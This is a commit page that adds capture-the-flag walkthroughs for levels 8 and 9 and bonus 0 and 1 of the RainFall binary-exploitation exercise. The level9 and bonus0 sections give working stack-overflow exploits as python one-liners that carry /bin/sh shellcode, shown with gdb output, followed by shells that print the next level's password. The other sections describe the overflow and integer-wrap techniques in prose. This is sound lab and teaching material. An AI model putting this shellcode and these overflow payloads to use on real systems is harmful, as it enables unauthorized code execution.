gbrochar
/
RainFall
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

chore: walkthrough for level8 through bonus1

This commit is contained in:
gbrochar 2025-05-20 10:21:51 +02:00
parent 0673f48aa5
commit 183947e401
4 changed files with 112 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

61
bonus0/Ressources/walkthrough.md Normal file
View File

@ -0,0 +1,61 @@
The program segfault when 2nd string is 20 char longs
```
Starting program: /home/user/bonus0/bonus0
-
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
-
AAAABBBBCXXXXDDDEEEE
aaaaaaaaaaaaaaaaaaaaAAAABBBBCXXXXDDDEEEE<EFBFBD><EFBFBD><EFBFBD> AAAABBBBCXXXXDDDEEEE<45><45><EFBFBD>
Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
```
we need to find where our 'a's are stored in the stack, each call to p reads so we will stop after the 1st and proceed to do a search.
It doesn't work, only thing we can find are a string of 20 'a's near eax.
We can see there is a strcpy just after both calls to p, and p writes to the same address, so maybe we can do something with that, considering the second string will override the first.
Still doesn't work, maybe check read's return in p function ?
Got it at 0xbfffe680, let's leave the function and check if the data's still there
during second read call, we see our data is still there, but the beginning have been override by our second string. Maybe we can ditch the first string entirely ?
let's try putting our shell code 3 characters after the 'X's and replace the 'X's with 0xbfffe690
```
bonus0@RainFall:~$ python -c "print('A'*9+'\x90\xe6\xff\xbf+'A'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')" > test.txt
File "<string>", line 1
print('A'*9+'\x90\xe6\xff\xbf+'A'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')
^
SyntaxError: invalid syntax
bonus0@RainFall:~$ python -c "print('A'*9+'\x90\xe6\xff\xbf'+'A'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')" > test.txt
bonus0@RainFall:~$ echo "a" > 1.txt
bonus0@RainFall:~$ (cat 1.txt ; cat test.txt ; cat) | /home/user/bonus0/bonus0
-
-
a AAAAAAAAA<41><41><EFBFBD><EFBFBD>AAA1<41><31>F<EFBFBD><46><EFBFBD>
whoami
bonus0@RainFall:~$
```
It's doesn't work with an empty first file, let's just put it twice so we don't have to worry about strings overriding or something.
Notice we use the full path of the binary to avoid the need for a NOP slide.
```
bonus0@RainFall:~$ (cat test.txt ; cat test.txt ; cat) | /home/user/bonus0/bonus0
-
-
AAAAAAAAA<EFBFBD><EFBFBD><EFBFBD><EFBFBD>AAA1<EFBFBD><EFBFBD>FAAAAAAAAA<EFBFBD><EFBFBD><EFBFBD><EFBFBD>AAA1<EFBFBD><EFBFBD>F<EFBFBD><EFBFBD><EFBFBD> AAAAAAAAA<41><41><EFBFBD><EFBFBD>AAA1<41><31>F<EFBFBD><46><EFBFBD>
whoami
bonus1
cat /home/user/bonus1/.pass
cd1f77a585965341c37a1774a1d1686326e1fc53aaa5459c840409d4d06523c9
```
:)

5
bonus1/Ressources/walkthrough.md Normal file
View File

@ -0,0 +1,5 @@
We can see using ghidra that we need the first number to be less than 10, but then we need it to be equal to 0x574f4c46, so we will have to change it and the only way to do that is by using the memcpy between the two conditional statements.
But the memcpy uses the result of atoi * 4 for the size of the cpy. But atoi result should be negative.
We will use c's wrapping overflow behavior for this problem, and memcpy will override the atoi result position with the desired number.

2
level8/Ressources/walkthrough.md Normal file
View File

@ -0,0 +1,2 @@
For this level, using ghidra we can see that there is a conditional statement that will open a shell. We need the 9th character of the string auth to be different than 0. We can overflow the buffer by adding trailing characters to the service prompt after the auth command.
We can also input the service command twice in a row to do that.

44
level9/Ressources/walkthrough.md Normal file
View File

@ -0,0 +1,44 @@
For the last level of the mandatory part, we notice there is a twist, as the binary seems to be a cpp code. We don't seem to see any shell or pass reading so we are going to use a shellcode.
Let's try to make the program segfault with 'A's it segfault from 109, if we put 112 in gdb with 'B's at the end, we get this segfault
```
(gdb) i r
eax 0x42424242 1111638594
ecx 0x42424242 1111638594
edx 0x804a07c 134520956
ebx 0x804a078 134520952
esp 0xbffff6a0 0xbffff6a0
ebp 0xbffff6c8 0xbffff6c8
esi 0x0 0
edi 0x0 0
eip 0x8048682 0x8048682 <main+142>
eflags 0x210287 [ CF PF SF IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) x/i $eip
=> 0x8048682 <main+142>: mov (%eax),%edx
(gdb)
```
later in the code, we got this
```0x8048693 <main+159> call *%edx```
That means we can put the target address we want to jump to at any point in the string, and put the adress of this at the 109-112 bytes.
We will target our shellcode with it.
```
level9@RainFall:~$ ./level9 `python -c "print('\x10\xa0\x04\x08'+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'A'*58+'\x0c\xa0\x04\x08')"`
$ whoami
bonus0
$ cat /home/user/bonus0/.pass
f3f0004b6f364cb5a4147e9ef827fa922a4861408845c26b6971ad770d906728
```
:)